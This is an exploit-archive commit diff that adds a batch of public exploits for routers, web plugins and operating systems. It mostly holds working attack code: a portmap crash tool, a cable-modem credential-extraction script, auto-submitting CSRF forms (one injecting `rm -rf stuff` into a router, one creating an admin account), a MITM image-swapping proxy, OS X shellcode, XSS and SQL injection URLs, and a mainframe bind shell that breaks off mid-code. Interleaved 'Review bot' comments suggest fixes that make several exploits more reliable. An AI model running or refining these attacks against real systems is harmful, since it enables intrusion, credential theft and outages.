DB: 2015-09-03

16 new exploits
This commit is contained in:
Offensive Security 2015-09-03 05:02:25 +00:00
parent 7669865812
commit 37dce18f7f
17 changed files with 1220 additions and 0 deletions


@ -34083,6 +34083,7 @@ id,file,description,date,author,platform,type,port
37754,platforms/php/webapps/37754.txt,"WordPress Candidate Application Form Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
37755,platforms/windows/local/37755.c,"Windows 2k3 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070)",2015-08-12,"Tomislav Paskalev",windows,local,0
37947,platforms/multiple/remote/37947.txt,"LiteSpeed Web Server 'gtitle' parameter Cross Site Scripting Vulnerability",2012-03-12,K1P0D,multiple,remote,0
37948,platforms/php/webapps/37948.txt,"Wordpress Slideshow Plugin Multiple Cross Site Scripting Vulnerabilities",2012-10-17,waraxe,php,webapps,0
37949,platforms/linux/remote/37949.txt,"ModSecurity POST Parameters Security Bypass Vulnerability",2012-10-17,"Bernhard Mueller",linux,remote,0
37950,platforms/php/webapps/37950.txt,"jCore /admin/index.php path Parameter XSS",2012-10-17,"High-Tech Bridge",php,webapps,0
37951,platforms/windows/remote/37951.py,"Easy File Sharing Web Server 6.9 - USERID Remote Buffer Overflow",2015-08-24,"Tracy Turben",windows,remote,0
@ -34163,6 +34164,8 @@ id,file,description,date,author,platform,type,port
37937,platforms/linux/local/37937.c,"Linux Kernel 3.2.x 'uname()' System Call Local Information Disclosure Vulnerability",2012-10-09,"Brad Spengler",linux,local,0
37938,platforms/php/webapps/37938.txt,"OpenX /www/admin/plugin-index.php parent Parameter XSS",2012-10-10,"High-Tech Bridge",php,webapps,0
37939,platforms/php/webapps/37939.txt,"FileContral Local File Include and Local File Disclosure Vulnerabilities",2012-08-11,"Ashiyane Digital Security Team",php,webapps,0
38066,platforms/php/webapps/38066.txt,"WordPress Video Lead Form Plugin 'errMsg' Parameter Cross Site Scripting Vulnerability",2012-11-29,"Aditya Balapure",php,webapps,0
38067,platforms/hardware/webapps/38067.py,"Thomson Wireless VoIP Cable Modem TWG850-4B ST9C.05.08 - Authentication Bypass",2015-09-02,"Glaysson dos Santos",hardware,webapps,80
37833,platforms/php/webapps/37833.txt,"YCommerce Multiple SQL Injection Vulnerabilities",2012-09-21,"Ricardo Almeida",php,webapps,0
37834,platforms/linux/remote/37834.py,"Samba 3.5.11/3.6.3 Unspecified Remote Code Execution Vulnerability",2012-09-24,kb,linux,remote,0
37835,platforms/php/webapps/37835.html,"WordPress Cross Site Request Forgery Vulnerability",2012-09-22,AkaStep,php,webapps,0
@ -34367,3 +34370,16 @@ id,file,description,date,author,platform,type,port
38054,platforms/windows/dos/38054.txt,"SiS Windows VGA Display Manager 6.14.10.3930 - Write-What-Where PoC",2015-09-01,KoreLogic,windows,dos,0
38055,platforms/windows/dos/38055.txt,"XGI Windows VGA Display Manager 6.14.10.1090 - Arbitrary Write PoC",2015-09-01,KoreLogic,windows,dos,0
38056,platforms/hardware/webapps/38056.txt,"Edimax BR6228nS/BR6228nC - Multiple Vulnerabilities",2015-09-01,smash,hardware,webapps,80
38057,platforms/php/webapps/38057.txt,"WordPress Magazine Basic Theme 'id' Parameter SQL Injection Vulnerability",2012-11-22,"Novin hack",php,webapps,0
38058,platforms/ios/remote/38058.py,"Twitter for iPhone Man in the Middle Security Vulnerability",2012-11-23,"Carlos Reventlov",ios,remote,0
38059,platforms/bsd/dos/38059.c,"OpenBSD 4.x Portmap Remote Denial of Service Vulnerability",2012-11-22,auto236751,bsd,dos,0
38060,platforms/php/webapps/38060.txt,"WordPress Ads Box Plugin 'count' Parameter SQL Injection Vulnerability",2012-11-26,"Ashiyane Digital Security Team",php,webapps,0
38061,platforms/php/webapps/38061.txt,"Beat Websites 'id' Parameter SQL Injection Vulnerability",2012-11-24,Metropolis,php,webapps,0
38062,platforms/multiple/webapps/38062.txt,"Forescout CounterACT 'a' Parameter Open Redirection Vulnerability",2012-11-26,"Joseph Sheridan",multiple,webapps,0
38063,platforms/php/webapps/38063.txt,"WordPress Wp-ImageZoom Theme 'id' Parameter SQL Injection Vulnerability",2012-11-26,Amirh03in,php,webapps,0
38064,platforms/php/webapps/38064.txt,"WordPress CStar Design 'id' Parameter SQL Injection Vulnerability",2012-11-27,Amirh03in,php,webapps,0
38065,platforms/osx/shellcode/38065.txt,"OS X x64 /bin/sh Shellcode_ NULL Byte Free_ 34 bytes",2015-09-02,"Fitzl Csaba",osx,shellcode,0
38072,platforms/windows/dos/38072.py,"SphereFTP Server 2.0 - Crash PoC",2015-09-02,"Meisam Monsef",windows,dos,21
38073,platforms/hardware/webapps/38073.html,"GPON Home Router FTP G-93RG1 - CSRF Command Execution Vulnerability",2015-09-02,"Phan Thanh Duy",hardware,webapps,80
38074,platforms/php/webapps/38074.txt,"Cerb 7.0.3 - CSRF Vulnerability",2015-09-02,"High-Tech Bridge SA",php,webapps,80
38075,platforms/system_z/shellcode/38075.txt,"Mainframe/System Z Bind Shell",2015-09-02,zedsec390,system_z,shellcode,0


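--- a/platforms/bsd/dos/38059.c
+++ b/platforms/bsd/dos/38059.c
@@ -0,0 +1,80 @@
+source: http://www.securityfocus.com/bid/56671/info
+OpenBSD is prone to a remote denial-of-service vulnerability.
+Successful exploits may allow the attacker to cause the application to crash, resulting in denial-of-service conditions.
+OpenBSD versions prior to 5.2 are vulnerable.
+/*
+* authors: 22733db72ab3ed94b5f8a1ffcde850251fe6f466
+* 6e2d3d47576f746e9e65cb4d7f3aaa1519971189
+* c8e74ebd8392fda4788179f9a02bb49337638e7b
+*
+* greetz: 43c86fd24bd63b100891ec4b861665e97230d6cf
+* e4c0f3f28cf322779375b71f1c14d6f8308f789d
+* 691cb088c45ec9e31823ca7ab0da8b4cf8079baf
+* b234a149e7ef00abc0f2ec7e6cf535ef4872eabc
+*
+*
+* -bash-4.2$ uname -a
+* OpenBSD obsd.my.domain 5.1 GENERIC#160 i386
+* -bash-4.2$ id
+* uid=32767(nobody) gid=32767(nobody) groups=32767(nobody)
+* -bash-4.2$ netstat -an -f inet | grep 111
+* tcp 0 0 127.0.0.1.111 *.* LISTEN
+* tcp 0 0 *.111 *.* LISTEN
+* udp 0 0 127.0.0.1.111 *.*
+* udp 0 0 *.111 *.*
+* -bash-4.2$ gcc openbsd_libc_portmap.c
+* -bash-4.2$ ./a.out
+* [+] This code doesn't deserve 1337 status output.
+* [+] Trying to crash portmap on 127.0.0.1:111
+* [+] 127.0.0.1:111 is now down.
+*
+*/
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#define HOST "127.0.0.1"
+#define PORT 111
+#define LOOP 0x100
+int main(void)
+{
+int s, i;
+struct sockaddr_in saddr;
+printf("[+] This code doesn't deserve 1337 status output.\n");
+printf("[+] Trying to crash portmap on %s:%d\n", HOST, PORT);
+saddr.sin_family = AF_INET;
+saddr.sin_port = htons(PORT);
+saddr.sin_addr.s_addr = inet_addr(HOST);
+s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
+if(connect(s, (struct sockaddr *) &saddr, sizeof(struct sockaddr_in)) == -1) {
+printf("[-] %s:%d is already down.\n", HOST, PORT);
+return EXIT_FAILURE;
+}
+/* # of iteration needed varies but starts working for > 0x30 */
+for(i=0; i < LOOP; ++i) {
+s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
+connect(s, (struct sockaddr *) &saddr, sizeof(struct sockaddr_in));
+send(s, "8========@", 10, 0);
+}
+if(connect(s, (struct sockaddr *) &saddr, sizeof(struct sockaddr_in)) == -1)
+printf("[+] %s:%d is now down.\n", HOST, PORT);
+else
+printf("[-] %s:%d is still listening. Try to increase loop iterations...\n");
+return EXIT_SUCCESS;
+}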
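Review bot: The `printf` on the `else` branch at the end of `main` has two conversion specifiers (`%s:%d`) but no arguments, which is undefined behaviour and will print garbage or crash instead of the intended status line; it should read `printf("[-] %s:%d is still listening. Try to increase loop iterations...\n", HOST, PORT);`. The return value of `socket()` is never checked, so once the process hits its descriptor limit inside the loop every later `connect()`/`send()` operates on `-1` and the final verdict is meaningless; a `if (s < 0) { perror("socket"); break; }` after each `socket()` call would make the printed result trustworthy. `main` is complete within the hunk.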


@ -0,0 +1,112 @@
###############################################################################
#+-////////////////////////////////////////////////////////////////////////////
#+-
#+- Exploit Title: Thomson Wireless VoIP Cable Modem Arbitrary File Access
#+- Date: October 22, 2013
#+- Author: Glaysson dos Santos
#+-
#+- Product: TWG850-4B Wireless VoIP Cable Modem
#+- Software Version: ST9C.05.08
#+- Hardware Version: 2.1
#+- BOOT Revision: 2.1.7i
#+- Standard Specification Compliant: DOCSIS 2.0
#+- Firmware Name: DWG850-4-9C.05.08-110217-S-1FF.bin
#+- Firmware Build Time 19:19:19 Thu Feb 17 2011
#+- Severity: High
#+-
#+-\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
################################################################################
import string
import urllib2
import sys
from time import sleep
import base64
import binascii
import os
save = 'log_TWG8504B.txt'
log = open(save,'w')
bifi = 'GatewaySettings.bin'
refi = 'RgComputers.asp'
R_C = ("\033[0;31m")
G_C = ("\033[1;32m")
D_C = ("\033[0m" )
def banner():
os.system('clear')
print "\nThomson Wireless VoIP Cable Modem DWG850 -4B (Software Version:ST9C.05.08)- Arbitrary File Read\n \
\t- 2013 - Glaysson dos Santos (0cn1)\n\n"
def hr_data(filename, min=4):
with open(filename, "rb") as f:
result = ""
for c in f.read():
if c in string.printable:
result += c
continue
if len(result) >= min:
yield result
print >> log, result
result = ""
print "(+)- Others Informations Extracted Saved in %s, but you've a Admin Password :D\n"%(save)
def checkcreds(router,username,password):
auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password(realm='Thomson',
uri = router,
user = username,
passwd= password)
opener = urllib2.build_opener(auth_handler)
try:
urllib2.install_opener(opener)
status = urllib2.urlopen('%s/%s'%(router,refi))
print '(+)- [status:%s%s%s] Authenticated successfuly, Enjoy it!'%(G_C,status.code,D_C)
except urllib2.URLError, e:
if e.code == 401:
print '(+)- [status:%s%s%s] Invalid Credentials! Try yourself in a browser.'%(R_C,e.code,D_C)
def checkvuln(router):
try:
print '(+)- Checking if target is vulnerable...'
req = urllib2.Request('%s/%s'%(router,bifi))
response = urllib2.urlopen(req)
page = response.read()
x = open(bifi,'wb')
x.write(page)
x.close()
sleep(1)
print '(+)- The target appears to be vulnerable, lets check it better!'
print '(+)- Searching Credentials...'
sleep(1)
for s in hr_data(bifi):
try:
dec = base64.decodestring(s)
if dec.find(':') != -1:
user,passwd = dec.split(':')
print '(+)- User: %s%s%s'%(G_C,user,D_C)
print '(+)- Pass: %s%s%s'%(G_C,passwd,D_C)
print '(+)- Checking if creds are OK...'
checkcreds(router,user,passwd)
except(binascii.Error):
pass
except urllib2.URLError, e:
print '[$] hollyshit! the target is not vuln! o.O (%s%s%s)'%(R_C,e.reason[1],D_C)
sys.exit(1)
if __name__ == "__main__":
banner()
if len(sys.argv) != 2:
print '[!] %sRun %s router IP%s\n'%(R_C,sys.argv[0],D_C)
sys.exit(2)
router = sys.argv[1]
if not "http" in router:
router = "http://"+(sys.argv[1])
checkvuln(router)
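Review bot: In `checkcreds` the handler `except urllib2.URLError, e:` reads `e.code`, but only `urllib2.HTTPError` has a `.code`; a plain `URLError` (connection refused, DNS failure) raises `AttributeError` inside the handler, and `e.reason[1]` in `checkvuln` likewise assumes `reason` is a socket-error tuple. Catch `except urllib2.HTTPError, e:` before the generic `URLError` in `checkcreds`, and in `checkvuln` print `getattr(e, 'reason', e)` rather than indexing it. `hr_data(filename, min=4)` shadows the `min` builtin and `log` is opened at module level but never closed or flushed before `sys.exit(1)`, so the last buffered `print >> log` lines may be lost. The header comment should also state that the downloaded `GatewaySettings.bin` and `log_TWG8504B.txt` are written to the current directory in plaintext, since they contain the extracted credentials.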


@ -0,0 +1,48 @@
<!--
######################################################################
# Exploit Title: GPON Home CSRF With Command ExecuteVulnerability
# Author: Phan Thanh Duy (logicaway) - KAISAI12 (ceh.vn)
# E-mail:(facebook https://www.facebook.com/duy.phanthanh.75),(
https://www.facebook.com/kai.sai.35)
# Category: Hardware
# Google Dork: N/A
# Vendor: FTP Viet Nam
# Firmware Version: 3.0.0 Build 120531
# Product: FTP G-93RG1
#
#
# Tested on: Windows 8 64-bit
######################################################################
#Introduction
==============
#Description of Vulnerability
=============================
Execute command with CSRF
#Exploit
========
-->
<html>
<head>
<title>CSRF Demo Exploit</title>
</head>
<body>
<form name="auto" method="POST"
action="http://192.168.1.1/GponForm/diag_XForm"
enctype="multipart/form-data">
<input type="hidden" name="XWebPageName" value="diag"/>
<input type="hidden" name="diag_action" value="ping"/>
<input type="hidden" name="wan_conlist" value="0"/>
<input type="hidden" name="dest_host" value="`rm -rf stuff`"/>
<input type="hidden" name="ipver" value="0"/>
<!-- input type="submit" name="submit"/> -->
</form>
<script type="text/javascript">
document.auto.submit();
</script>
</body>
</html>

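--- a/platforms/ios/remote/38058.py
+++ b/platforms/ios/remote/38058.py
@@ -0,0 +1,115 @@
+source: http://www.securityfocus.com/bid/56665/info
+Twitter for iPhone is prone to a security vulnerability that lets attackers to perform a man-in-the-middle attack.
+Attackers can exploit this issue to capture and modify pictures that the user sees in the application.
+Twitter for iPhone 5.0 is vulnerable; other versions may also be affected.
+/*
+Twitter App, eavesdroping PoC
+Written by Carlos Reventlov <carlos@reventlov.com>
+License MIT
+*/
+package main
+import (
+"fmt"
+"github.com/xiam/hyperfox/proxy"
+"github.com/xiam/hyperfox/tools/logger"
+"io"
+"log"
+"os"
+"path"
+"strconv"
+"strings"
+)
+const imageFile = "spoof.jpg"
+func init() {
+_, err := os.Stat(imageFile)
+if err != nil {
+panic(err.Error())
+}
+}
+func replaceAvatar(pr *proxy.ProxyRequest) error {
+stat, _ := os.Stat(imageFile)
+image, _ := os.Open(imageFile)
+host := pr.Response.Request.Host
+if strings.HasSuffix(host, "twimg.com") == true {
+if pr.Response.ContentLength != 0 {
+file := "saved" + proxy.PS + pr.FileName
+var ext string
+contentType := pr.Response.Header.Get("Content-Type")
+switch contentType {
+case "image/jpeg":
+ext = ".jpg"
+case "image/gif":
+ext = ".gif"
+case "image/png":
+ext = ".png"
+case "image/tiff":
+ext = ".tiff"
+}
+if ext != "" {
+fmt.Printf("** Saving image.\n")
+os.MkdirAll(path.Dir(file), os.ModeDir|os.FileMode(0755))
+fp, _ := os.Create(file)
+if fp == nil {
+fmt.Errorf(fmt.Sprintf("Could not open file %s for writing.", file))
+}
+io.Copy(fp, pr.Response.Body)
+fp.Close()
+pr.Response.Body.Close()
+}
+}
+fmt.Printf("** Sending bogus image.\n")
+pr.Response.ContentLength = stat.Size()
+pr.Response.Header.Set("Content-Type", "image/jpeg")
+pr.Response.Header.Set("Content-Length",
+strconv.Itoa(int(pr.Response.ContentLength)))
+pr.Response.Body = image
+}
+return nil
+}
+func main() {
+p := proxy.New()
+p.AddDirector(logger.Client(os.Stdout))
+p.AddInterceptor(replaceAvatar)
+p.AddLogger(logger.Server(os.Stdout))
+var err error
+err = p.Start()
+if err != nil {
+log.Printf(fmt.Sprintf("Failed to bind: %s.\n", err.Error()))
+}
+}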
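Review bot: In `replaceAvatar` the `fmt.Errorf(...)` inside `if fp == nil` builds an error value and discards it, so a failed `os.Create` still falls through to `io.Copy(fp, ...)` and `fp.Close()` on a nil `*os.File` and panics; the errors from `os.Stat`, `os.Open` and `os.Create` are all dropped with `_` even though the function already returns `error`. Use `fp, err := os.Create(file)` followed by `if err != nil { return err }`, and the same pattern for `os.Open(imageFile)`, so the caller sees the failure. The file is stored as `platforms/ios/remote/38058.py` but it is Go source (`package main`, Go imports), which misleads extension-based classification and tooling; a line in the description header saying it is a Go program that needs the `hyperfox` package to build would help. In `main`, `log.Printf(fmt.Sprintf(...))` passes a pre-formatted string as the format and should be `log.Printf("Failed to bind: %s.\n", err.Error())`.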


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/56687/info
Forescout CounterACT is prone to an open-redirection vulnerability because the application fails to properly sanitize user-supplied input.
A successful exploit may aid in phishing attacks; other attacks are possible.
Forescout CounterACT 6.3.4.1 is vulnerable; other versions may also be affected.
http://www.example.com/assets/login?a=http://www.evil.com


@ -0,0 +1,66 @@
[*] Author: Csaba Fitzl, @theevilbit
[*] Tested on OS X 10.10.5
[*] OS X x64 /bin/sh shellcode, NULL byte free, 34 bytes
[*] Assembly version
[*] binsh-shellcode.asm
[*] ./nasm -f macho64 binsh-shellcode.asm
[*] ld -macosx_version_min 10.7.0 -o binsh-shellcode binsh-shellcode.o
-------------------------------------------------------------------------------
BITS 64
global start
section .text
start:
xor rsi,rsi ;zero out RSI
push rsi ;push NULL on stack
mov rdi, 0x68732f6e69622f2f ;mov //bin/sh string to RDI (reverse)
push rdi ;push rdi to the stack
mov rdi, rsp ;store RSP (points to the command string) in RDI
xor rdx, rdx ;zero out RDX
;store syscall number on RAX
xor rax,rax ;zero out RAX
mov al,2 ;put 2 to AL -> RAX = 0x0000000000000002
ror rax, 0x28 ;rotate the 2 -> RAX = 0x0000000002000000
mov al,0x3b ;move 3b to AL (execve SYSCALL#) -> RAX = 0x000000000200003b
syscall ;trigger syscall
-------------------------------------------------------------------------------
[*] C version
[*] Get the hex opcodes from the object file: otool -t binsh-shellcode.o
[*] binsh-shellcode.c
[*] Compile: gcc binsh-shellcode.c -o sc
[*] Run: ./sc
-------------------------------------------------------------------------------
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
int (*sc)();
char shellcode[] =
"\x48\x31\xf6\x56\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x48\x89\xe7\x48\x31\xd2\x48\x31\xc0\xb0\x02\x48\xc1\xc8\x28\xb0\x3b\x0f\x05";
int main(int argc, char **argv) {
void *ptr = mmap(0, 0x22, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON
| MAP_PRIVATE, -1, 0);
if (ptr == MAP_FAILED) {
perror("mmap");
exit(-1);
}
memcpy(ptr, shellcode, sizeof(shellcode));
sc = ptr;
sc();
return 0;
}
-------------------------------------------------------------------------------
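Review bot: In the C harness, `mmap(0, 0x22, ...)` requests 34 bytes while `memcpy(ptr, shellcode, sizeof(shellcode))` copies 35, because `sizeof` on the string literal counts the terminating NUL; the mapping is page-granular so it happens to work, but the two lengths should agree: `void *ptr = mmap(0, sizeof(shellcode), PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);`. `exit(-1)` produces exit status 255; `exit(EXIT_FAILURE)` states the intent and is what `<stdlib.h>` is included for. The old-style declaration `int (*sc)();` should be `int (*sc)(void);` under C99 and later.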

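--- a/platforms/php/webapps/37948.txt
+++ b/platforms/php/webapps/37948.txt
@@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/56090/info
+The Slideshow plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+http://www.example.com/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=";><script>alert(123);</script>
+http://www.example.com/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=<script>alert(123);</script>
+http://www.example.com/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?settings=<body+onload='alert(123)'>
+http://www.example.com/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=<script>alert(123);</script>
+http://www.example.com/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings
+http://www.example.com/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0][3]=<script>alert(123);</script>
+http://www.example.com/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=<script>alert(123);</script>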


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/56664/info
The Magazine Basic theme for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/wp-content/themes/magazine-basic/view_artist.php?id=[SQL]


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/56681/info
The Ads Box plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/wp-content/plugins/ads-box/iframe_ampl.php?count=[SQLi]

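--- a/platforms/php/webapps/38061.txt
+++ b/platforms/php/webapps/38061.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/56683/info
+Beat Websites is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+Beat Websites 1.0 is vulnerable; other versions may also be affected.
+http://www.example.com/page_detail.php?id=1 and 1=1
+http://www.example.com/page_detail.php?id=1 and 1=2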


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/56691/info
The Wp-ImageZoom theme for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/wp-content/plugins/wp-imagezoom/zoom.php?id=[SQL]


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/56694/info
The CStar Design theme for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/wp-content/themes/cstardesign/swf/flashmo/flashmoXML.php?id=[SQL]


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/56737/info
The Video Lead Form plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Video Lead Form 0.5 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-admin/admin.php?page=video-lead-form&errMsg=%27;alert%28String.fromCharCode%2888,83,83%29%29//%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

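--- a/platforms/php/webapps/38074.txt
+++ b/platforms/php/webapps/38074.txt
@@ -0,0 +1,81 @@
+Advisory ID: HTB23269
+Product: Cerb
+Vendor: Webgroup Media LLC
+Vulnerable Version(s): 7.0.3 and probably prior
+Tested Version: 7.0.3
+Advisory Publication: August 12, 2015 [without technical details]
+Vendor Notification: August 12, 2015
+Vendor Patch: August 14, 2015
+Public Disclosure: September 2, 2015
+Vulnerability Type: Cross-Site Request Forgery [CWE-352]
+CVE Reference: CVE-2015-6545
+Risk Level: Medium
+CVSSv2 Base Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
+Solution Status: Fixed by Vendor
+Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
+-----------------------------------------------------------------------------------------------
+Advisory Details:
+High-Tech Bridge Security Research Lab discovered CSRF vulnerability in Cerb platform, which can be exploited to perform Cross-Site Request Forgery attacks against administrators of vulnerable web application to add administrate accounts into the system.
+The vulnerability exists due to failure of the "/ajax.php" script to properly verify the source of incoming HTTP request. Taking into consideration that Cerb is a business-critical application, this security flaw may be quite dangerous if exploited by malicious attackers.
+A simple exploit below will add admin user into the system when a logged-in victim opens a malicious page with the exploit:
+<form action="http://[host]/ajax.php" method = "POST">
+<input type="hidden" name="c" value="config">
+<input type="hidden" name="a" value="handleSectionAction">
+<input type="hidden" name="section" value="workers">
+<input type="hidden" name="action" value="saveWorkerPeek">
+<input type="hidden" name="id" value="0">
+<input type="hidden" name="view_id" value="workers_cfg">
+<input type="hidden" name="do_delete" value="0">
+<input type="hidden" name="first_name" value="first name">
+<input type="hidden" name="last_name" value="last name">
+<input type="hidden" name="title" value="title">
+<input type="hidden" name="email" value="username@mail.com">
+<input type="hidden" name="at_mention_name" value="name">
+<input type="hidden" name="is_disabled" value="0">
+<input type="hidden" name="is_superuser" value="1">
+<input type="hidden" name="lang_code" value="en_US">
+<input type="hidden" name="timezone" value="Antarctica%2FTroll">
+<input type="hidden" name="time_format" value="D%2C+d+M+Y+h%3Ai+a">
+<input type="hidden" name="auth_extension_id" value="login.password">
+<input type="hidden" name="password_new" value="password">
+<input type="hidden" name="password_verify" value="password">
+<input type="hidden" name="calendar_id" value="new">
+<input value="submit" id="btn" type="submit" />
+</form>
+<script>
+document.getElementById('btn').click();
+</script>
+-----------------------------------------------------------------------------------------------
+Solution:
+Update to Cerb 7.0.4
+More Information:
+https://github.com/wgm/cerb/commit/12de87ff9961a4f3ad2946c8f47dd0c260607144
+http://wiki.cerbweb.com/7.0#7.0.4
+-----------------------------------------------------------------------------------------------
+References:
+[1] High-Tech Bridge Advisory HTB23269 - https://www.htbridge.com/advisory/HTB23269 - Cross-Site Request Forgery in Cerb.
+[2] Cerb - http://www.cerberusweb.com/ - Cerb is a fast and flexible platform for enterprise collaboration, productivity, and automation.
+[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
+[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
+[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
+-----------------------------------------------------------------------------------------------
+Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.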


@ -0,0 +1,610 @@
TITLE 'bind shell for mainframe/system Z'
BINDSH CSECT
BINDSH AMODE 31
BINDSH RMODE ANY
***********************************************************************
* *
* @SETUP registers and save areas *
* *
***********************************************************************
@SETUP DS 0F # full word boundary
STM 14,12,12(13) # save our registers
LARL 15,@SETUP # base address into R15
LR 8,15 # copy R15 to R8
USING @SETUP,8 # R8 for addressability throughout
LARL 11,SAVEAREA # sa address
ST 13,4(,11) # save callers save area
LR 13,11 # R13 to our save area
DS 0H # halfword boundaries
***********************************************************************
* *
* @LOADFS - load all the functions we need *
* for SC loop this *
* *
***********************************************************************
@LOADFS L 2,FFUNC # first function we use
LHI 3,8 # used for our index
L 4,NUMFUNC # number of functions to load
@LDLOOP LR 0,2 # load string of func name
XR 1,1 # clear R1
SVC 8 # perform LOAD
XC 0(8,2),0(2) # clear current Func space
ST 0,0(0,2) # store addr in func space
AR 2,3 # increment R2 by 8
AHI 4,-1 # decrement R4
CIB 4,0,2,@LDLOOP # compare R4 with 0,if GT loop
***********************************************************************
* *
* Create pipes to be used to communicate with child proc *
* that will be created in upcoming forking *
* *
***********************************************************************
@CPIPES LARL 14,@CFD
BRC 15,LPIPE # get FDs for child proc
@CFD ST 5,CFDR # store child read fd
ST 6,CFDW # store child write fd
@CPIPE2 LARL 14,@PFD
BRC 15,LPIPE # get FDs for parent proc
@PFD ST 5,PFDR # store parent read fd
ST 6,PFDW # store parent write fd
***********************************************************************
* *
* BP1FRK (FORK) fork a child process *
* *
***********************************************************************
LFORK L 15,BFRK # load func addr to 15
CALL (15),(CPROCN,RTN_COD,RSN_COD),VL
BRAS 0,@PREPCHL
****************************************************
* chk return code here anything but -1 is ok *
****************************************************
LHI 15,1 # load 1 for RC / Debugging
L 6,CPROCN # locad Ret val in R6
CIB 6,-1,8,EXITP # compare R6 to -1 and jump if eq
****************************************************
* prepare the child process for exec , only runs *
* if CPROCN (child pid from fork) equals 0 *
****************************************************
@PREPCHL L 2,CPROCN # load child proc # to R2
CIB 2,0,7,@PREPPAR # R2 not 0? We are parent, move on
*************************************************
* order of things to prep child pid *
* 0) Close parent write fd *
* 1) Close child read fd *
* 2) dupe parent read fd to std input *
* 3) dupe child write fd to std output *
* 4) dupe child write fd to std err *
* 5) Close parent read fd *
* 6) Close child write fd *
* 7) exec /bin/sh *
*************************************************
LARL 14,@PRC1
LA 2,F_CLOSFD
L 5,PFDW # load R5 with pfdw
L 6,PFDW # load R5 with pfdw
@PRC0 BRC 15,LFCNTL # call close
@PRC1 LARL 14,@PRC2
LA 2,F_CLOSFD
L 5,CFDR # load R5 with cfdr
L 6,CFDR # load R5 with cfdr
BRC 15,LFCNTL # call close
@PRC2 LARL 14,@PRC3
LA 2,F_DUPFD2 # gonna do a dup2
L 5,PFDR # parent read fd
LGFI 6,0 # std input
BRC 15,LFCNTL # call dupe2
@PRC3 LARL 14,@PRC4
LA 2,F_DUPFD2 # gonna do a dup2
L 5,CFDW # child write fd
LGFI 6,1 # std output
BRC 15,LFCNTL # call dupe2
@PRC4 LARL 14,@PRC5 # if 0 we are in child pid, goto exec
